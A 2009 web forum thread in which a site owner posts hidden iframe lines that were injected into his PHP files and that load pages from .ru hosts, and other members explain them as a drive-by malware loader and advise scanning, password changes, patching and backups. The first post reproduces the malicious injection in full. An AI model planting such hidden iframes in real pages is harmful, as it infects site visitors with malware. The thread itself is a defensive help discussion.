1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

This piece of code hijacked my site

Discussion in 'PHP' started by Nilzar, Jul 10, 2009.

  1. #1
    <iframe src="http://a5f.ru:8080/ts/in.cgi?pepsi93" width=125 height=125 style="visibility: 
    <iframe src="http://a5f.ru:8080/ts/in.cgi?pepsi93" width=125 height=125 style="visibility:
    <iframe src="http://a5f.ru:8080/ts/in.cgi?pepsi93" width=125 height=125 style="visibility
    <iframe src="http://u5d.ru:8080/index.php" width=154 height=195 style="visibilit
    <iframe src="http://u5v.ru:8080/index.php" width=162 height=104 style="visibili
    <iframe src="http://u5v.ru:8080/index.php" width=190 height=178 style="visibility: hidden"></iframe>
    PHP:
    I decided to visit my site because I have had no sales/hops in awile and my page would not load. I found this piece of code in my php files.

    has anyone seen this code before? and what does it do?
     
    Nilzar, Jul 10, 2009 IP
  2. TecBrat

    TecBrat Member

    Messages:
    31
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    48
    #2
    It puts an invisible frame (iframe) on your site. Inside that frame is a russian website that is probably pushing viruses or other malware onto your visitor's computers. Do a virus check on any computer that has FTP access to this site, then change your FTP password. Check for insecure PHP scripts as well. (Try to keep the latest version of any web apps you have installed.)
     
    TecBrat, Jul 10, 2009 IP
  3. anthonywebs

    anthonywebs Banned

    Messages:
    657
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    0
    #3
    its just an iframe, they are steeling bandwidth
     
    anthonywebs, Jul 10, 2009 IP
  4. TecBrat

    TecBrat Member

    Messages:
    31
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    48
    #4
    Unless you visit the url in the source of the iframe, you won't know what they are doing. I'd advise against visiting those addresses because of the likelyhood that they contain malware of one sort or another.

    I guess it really doesn't matter what they are doing, the important thing is to get the files cleaned up and to plug the hole that let them in to begin with.
     
    TecBrat, Jul 10, 2009 IP
  5. 123

    123 Peon

    Messages:
    621
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    0
    #5
    I've had a bad experience with this. It is an iframe virus which downloads the virus to any of your visitors' computers. Later I found that there was a Trojan on my comp and whenever I used FTP to upload files to my server the virus would get uploaded. Avast (free) antivirus detects this virus. My suggestion is to install avast or any good antivirus and scan your PC first. The virus also damages the other files on the server often removing a part of the code from some of the files. Better to keep a backup of all your files 'cause this is probably not the last time you will see it. Back up and be prepared to replace any infected (eaten up) files. And most importantly clean up your PC.
     
    123, Jul 18, 2009 IP